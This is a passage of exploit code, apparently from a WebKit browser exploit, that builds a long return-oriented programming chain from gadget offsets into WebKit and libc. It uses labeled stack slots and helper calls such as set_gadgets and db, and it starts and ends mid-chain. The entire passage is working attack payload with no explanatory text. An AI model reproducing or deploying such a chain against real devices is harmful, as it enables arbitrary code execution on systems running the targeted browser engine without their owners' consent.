webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+268104, //L5031
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5030:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5031:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+268192, //L5033
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5033:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+268248, //L5034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5034:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+268320, //L5037
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5037:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+268376, //L5038
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5038:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+271584, //L5040
//L4981:
libc_base+764760, //pop rsi
ropchain+268480, //L5041
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5041:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5043:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+268600, //L5046
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+268584, //L5044
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5044:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5046:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+268776, //L5049
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+268792, //L5050
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+268744, //L5047
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+268760, //L5048
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5047:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5048:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5049:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5050:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+268888, //L5052
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+268872, //L5051
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5051:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5052:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5053:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5054:
db([3, 0]); // 0x3
set_gadget(libc_base+763368,); //pop rcx
//L5055:
db([3, 0]); // 0x3
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+269088, //L5057
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5057:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+269144, //L5058
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5058:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+269280, //L5062
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+269264, //L5061
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5060:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L5061:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5062:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+269416, //L5065
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+269448, //L5067
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+269400, //L5064
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5064:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5065:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5066:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5067:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+269560, //L5068+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+269552, //L5068
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5068:
db([0, 0]); // 0x0
set_gadgets([
ropchain+269576, //L5068+24
ropchain+271584, //L5063
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+269616, //L5069
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5069:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5070:
db([32, 0]); // 0x20
set_gadget(libc_base+144605,); //pop rdi
//L5071:
db([32, 0]); // 0x20
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+269808, //L5075
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+269776, //L5073
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+269792, //L5074
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5072:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5073:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5074:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5075:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+269864, //L5077
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5077:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+269992, //L5079
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+270008, //L5080
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+269976, //L5078
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5078:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5079:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5080:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+270104, //L5082
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+270088, //L5081
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5081:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5082:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+270184, //L5083
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5083:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5085:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+270304, //L5088
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+270288, //L5086
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5086:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5088:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+270448, //L5091
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+270416, //L5089
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+270432, //L5090
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5089:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5090:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5091:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+270520, //L5093
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5093:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+270576, //L5094
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5094:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+270656, //L5096
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5096:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5098:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+270776, //L5101
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+270760, //L5099
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5099:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5101:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+270920, //L5104
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+270888, //L5102
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+270904, //L5103
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5102:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5103:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5104:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+271008, //L5106
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L5105:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L5106:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+271064, //L5107
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5107:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5109:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+271144, //L5111
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5111:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+271248, //L5112
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+271264, //L5113
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5112:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5113:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+271352, //L5115
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5115:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+271408, //L5116
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5116:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+271480, //L5119
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5119:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+271536, //L5120
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5120:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L5063:
//L5040:
//L4958:
//L4869:
libc_base+764760, //pop rsi
ropchain+271624, //L5122
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5122:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5124:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+271744, //L5127
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+271728, //L5125
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5125:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5127:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+271920, //L5130
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+271936, //L5131
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+271888, //L5128
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+271904, //L5129
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5128:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5129:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5130:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5131:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+272032, //L5133
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+272016, //L5132
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5132:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5133:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+272112, //L5134
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5134:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5136:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+272232, //L5139
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+272216, //L5137
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5137:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5139:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+272408, //L5142
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+272424, //L5143
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+272376, //L5140
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+272392, //L5141
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5140:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5141:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5142:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5143:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+272520, //L5145
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+272504, //L5144
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5144:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5145:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+272600, //L5146
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5146:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5148:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+272720, //L5151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+272704, //L5149
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5149:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5151:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+272864, //L5154
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+272832, //L5152
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+272848, //L5153
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5152:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5153:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5154:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+272944, //L5155
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5155:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5157:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+273064, //L5160
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+273048, //L5158
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5158:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5160:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+273208, //L5163
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+273176, //L5161
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+273192, //L5162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5161:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5162:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5163:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+273288, //L5164
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5164:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5166:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+273408, //L5169
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+273392, //L5167
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5167:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5169:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+273552, //L5172
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+273520, //L5170
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+273536, //L5171
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5170:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5171:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5172:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+273632, //L5173
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5173:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5175:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+273752, //L5178
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+273736, //L5176
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5176:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5178:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+273896, //L5181
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+273864, //L5179
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+273880, //L5180
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5179:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5180:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5181:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+273976, //L5182
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5182:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5184:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+274096, //L5187
